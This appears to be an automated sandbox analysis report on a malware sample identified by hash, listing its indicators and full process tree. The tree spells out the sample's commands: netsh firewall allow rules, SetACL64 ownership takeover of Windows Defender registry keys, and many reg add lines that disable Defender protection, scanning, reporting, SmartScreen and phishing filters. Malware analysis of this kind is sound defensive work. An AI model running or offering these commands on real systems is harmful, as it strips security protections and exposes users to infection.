PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 116 Setup.exe 116 Setup.exe 116 Setup.exe 116 Setup.exe 116 Setup.exe 116 Setup.exe 116 Setup.exe 116 Setup.exe 4004 Setup.exe 4004 Setup.exe 4004 Setup.exe 4004 Setup.exe 4004 Setup.exe 4004 Setup.exe 4004 Setup.exe 4004 Setup.exe 1324 PowerRun64.exe 1324 PowerRun64.exe 1324 PowerRun64.exe 1324 PowerRun64.exe 3528 PowerRun64.exe 3528 PowerRun64.exe 3528 PowerRun64.exe 3528 PowerRun64.exe 4400 PowerRun64.exe 4400 PowerRun64.exe 4400 PowerRun64.exe 4400 PowerRun64.exe 4144 PowerRun64.exe 4144 PowerRun64.exe 4144 PowerRun64.exe 4144 PowerRun64.exe 3588 PowerRun64.exe 3588 PowerRun64.exe 3588 PowerRun64.exe 3588 PowerRun64.exe 2592 PowerRun64.exe 2592 PowerRun64.exe 2592 PowerRun64.exe 2592 PowerRun64.exe 5080 PowerRun64.exe 5080 PowerRun64.exe 5080 PowerRun64.exe 5080 PowerRun64.exe 5028 PowerRun64.exe 5028 PowerRun64.exe 5028 PowerRun64.exe 5028 PowerRun64.exe 2368 PowerRun64.exe 2368 PowerRun64.exe 2368 PowerRun64.exe 2368 PowerRun64.exe 3340 PowerRun64.exe 3340 PowerRun64.exe 3340 PowerRun64.exe 3340 PowerRun64.exe 4368 PowerRun64.exe 4368 PowerRun64.exe 4368 PowerRun64.exe 4368 PowerRun64.exe 1028 PowerRun64.exe 1028 PowerRun64.exe 3096 PowerRun64.exe 3096 PowerRun64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 2312 SetACL64.exe Token: SeRestorePrivilege 2312 SetACL64.exe Token: SeTakeOwnershipPrivilege 2312 SetACL64.exe Token: SeBackupPrivilege 904 SetACL64.exe Token: SeRestorePrivilege 904 SetACL64.exe Token: SeTakeOwnershipPrivilege 904 SetACL64.exe Token: SeBackupPrivilege 5056 SetACL64.exe Token: SeRestorePrivilege 5056 SetACL64.exe Token: SeTakeOwnershipPrivilege 5056 SetACL64.exe Token: SeBackupPrivilege 5020 SetACL64.exe Token: SeRestorePrivilege 5020 SetACL64.exe Token: SeTakeOwnershipPrivilege 5020 SetACL64.exe Token: SeBackupPrivilege 3052 SetACL64.exe Token: SeRestorePrivilege 3052 SetACL64.exe Token: SeTakeOwnershipPrivilege 3052 SetACL64.exe Token: SeBackupPrivilege 4980 SetACL64.exe Token: SeRestorePrivilege 4980 SetACL64.exe Token: SeTakeOwnershipPrivilege 4980 SetACL64.exe Token: SeBackupPrivilege 4116 SetACL64.exe Token: SeRestorePrivilege 4116 SetACL64.exe Token: SeTakeOwnershipPrivilege 4116 SetACL64.exe Token: SeBackupPrivilege 2568 SetACL64.exe Token: SeRestorePrivilege 2568 SetACL64.exe Token: SeTakeOwnershipPrivilege 2568 SetACL64.exe Token: SeDebugPrivilege 1324 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1324 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1324 PowerRun64.exe Token: 0 1324 PowerRun64.exe Token: SeDebugPrivilege 3528 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 3528 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 3528 PowerRun64.exe Token: SeDebugPrivilege 4400 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 4400 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 4400 PowerRun64.exe Token: 0 4400 PowerRun64.exe Token: SeDebugPrivilege 4144 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 4144 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 4144 PowerRun64.exe Token: SeDebugPrivilege 3588 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 3588 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 3588 PowerRun64.exe Token: 0 3588 PowerRun64.exe Token: SeDebugPrivilege 2592 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2592 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2592 PowerRun64.exe Token: SeDebugPrivilege 5080 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 5080 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 5080 PowerRun64.exe Token: 0 5080 PowerRun64.exe Token: SeDebugPrivilege 5028 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 5028 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 5028 PowerRun64.exe Token: SeDebugPrivilege 2368 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2368 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2368 PowerRun64.exe Token: 0 2368 PowerRun64.exe Token: SeDebugPrivilege 3340 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 3340 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 3340 PowerRun64.exe Token: SeDebugPrivilege 4368 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 4368 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 4368 PowerRun64.exe Token: 0 4368 PowerRun64.exe Token: SeDebugPrivilege 1028 PowerRun64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4680 wrote to memory of 408 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 83 PID 4680 wrote to memory of 408 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 83 PID 4680 wrote to memory of 408 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 83 PID 4680 wrote to memory of 5040 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 85 PID 4680 wrote to memory of 5040 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 85 PID 4680 wrote to memory of 5040 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 85 PID 4680 wrote to memory of 4484 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 87 PID 4680 wrote to memory of 4484 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 87 PID 4680 wrote to memory of 4484 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 87 PID 4484 wrote to memory of 116 4484 dotNetFx40_Full_setup.exe 88 PID 4484 wrote to memory of 116 4484 dotNetFx40_Full_setup.exe 88 PID 4484 wrote to memory of 116 4484 dotNetFx40_Full_setup.exe 88 PID 4680 wrote to memory of 3624 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 95 PID 4680 wrote to memory of 3624 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 95 PID 4680 wrote to memory of 3624 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 95 PID 3624 wrote to memory of 4004 3624 dotNetFx45_Full_setup.exe 96 PID 3624 wrote to memory of 4004 3624 dotNetFx45_Full_setup.exe 96 PID 3624 wrote to memory of 4004 3624 dotNetFx45_Full_setup.exe 96 PID 4680 wrote to memory of 4776 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 103 PID 4680 wrote to memory of 4776 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 103 PID 4680 wrote to memory of 4776 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 103 PID 4776 wrote to memory of 2312 4776 cmd.exe 105 PID 4776 wrote to memory of 2312 4776 cmd.exe 105 PID 4776 wrote to memory of 904 4776 cmd.exe 106 PID 4776 wrote to memory of 904 4776 cmd.exe 106 PID 4776 wrote to memory of 5056 4776 cmd.exe 107 PID 4776 wrote to memory of 5056 4776 cmd.exe 107 PID 4776 wrote to memory of 5020 4776 cmd.exe 108 PID 4776 wrote to memory of 5020 4776 cmd.exe 108 PID 4776 wrote to memory of 3052 4776 cmd.exe 109 PID 4776 wrote to memory of 3052 4776 cmd.exe 109 PID 4776 wrote to memory of 4980 4776 cmd.exe 110 PID 4776 wrote to memory of 4980 4776 cmd.exe 110 PID 4776 wrote to memory of 4116 4776 cmd.exe 111 PID 4776 wrote to memory of 4116 4776 cmd.exe 111 PID 4680 wrote to memory of 4892 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 112 PID 4680 wrote to memory of 4892 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 112 PID 4680 wrote to memory of 4892 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 112 PID 4892 wrote to memory of 2568 4892 cmd.exe 114 PID 4892 wrote to memory of 2568 4892 cmd.exe 114 PID 4892 wrote to memory of 1544 4892 cmd.exe 115 PID 4892 wrote to memory of 1544 4892 cmd.exe 115 PID 4892 wrote to memory of 1544 4892 cmd.exe 115 PID 4892 wrote to memory of 2396 4892 cmd.exe 116 PID 4892 wrote to memory of 2396 4892 cmd.exe 116 PID 4892 wrote to memory of 2396 4892 cmd.exe 116 PID 4892 wrote to memory of 1476 4892 cmd.exe 117 PID 4892 wrote to memory of 1476 4892 cmd.exe 117 PID 4892 wrote to memory of 1476 4892 cmd.exe 117 PID 4892 wrote to memory of 4216 4892 cmd.exe 118 PID 4892 wrote to memory of 4216 4892 cmd.exe 118 PID 4892 wrote to memory of 4216 4892 cmd.exe 118 PID 4892 wrote to memory of 4400 4892 cmd.exe 119 PID 4892 wrote to memory of 4400 4892 cmd.exe 119 PID 4892 wrote to memory of 4400 4892 cmd.exe 119 PID 4892 wrote to memory of 1152 4892 cmd.exe 120 PID 4892 wrote to memory of 1152 4892 cmd.exe 120 PID 4892 wrote to memory of 1152 4892 cmd.exe 120 PID 4892 wrote to memory of 5036 4892 cmd.exe 121 PID 4892 wrote to memory of 5036 4892 cmd.exe 121 PID 4892 wrote to memory of 5036 4892 cmd.exe 121 PID 4892 wrote to memory of 3860 4892 cmd.exe 122 PID 4892 wrote to memory of 3860 4892 cmd.exe 122 PID 4892 wrote to memory of 3860 4892 cmd.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe"C:\Users\Admin\AppData\Local\Temp\c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=mbbyfatkrvotaiy dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe" enable=yes profile=public,private2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:408
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=mbbyfatkrvotaiy dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe" enable=yes profile=public,private2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5040
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx40_Full_setup.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx40_Full_setup.exe" /q /norestart2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\a349b1eb03090b4a35abe7ee\Setup.exeC:\a349b1eb03090b4a35abe7ee\\Setup.exe /q /norestart /x86 /x64 /ia64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:116
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx45_Full_setup.exe"C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx45_Full_setup.exe" /q /norestart2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\c66f28a2ba92f62644960bdbdf661f\Setup.exeC:\c66f28a2ba92f62644960bdbdf661f\\Setup.exe /q /norestart /x86 /x64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bn.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bnz.bat2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f3⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f3⤵
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:1476
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:4216
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:4400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:5036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:3860
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:3060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1808
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:5116
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:3656
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:3924
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f3⤵
- System Location Discovery: System Language Discovery
PID:1792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bnn.bat2⤵
- System Location Discovery: System Language Discovery
PID:1736 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f3⤵PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bn1.bat2⤵
- System Location Discovery: System Language Discovery
PID:444 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f3⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2116
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:3708
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:5052
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:4588
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1812
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:712
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:1312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f3⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f3⤵PID:3020
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f3⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f3⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2900
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3016
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2488
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4408
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3684
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f3⤵
- System Location Discovery: System Language Discovery
PID:5012
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2960
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f3⤵PID:4264
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:4364
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:4372
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:864
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f3⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f3⤵PID:3144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:1472
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f3⤵PID:2284
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f3⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f3⤵PID:4600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:368
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f3⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:4360
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:3624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:4484
-
-
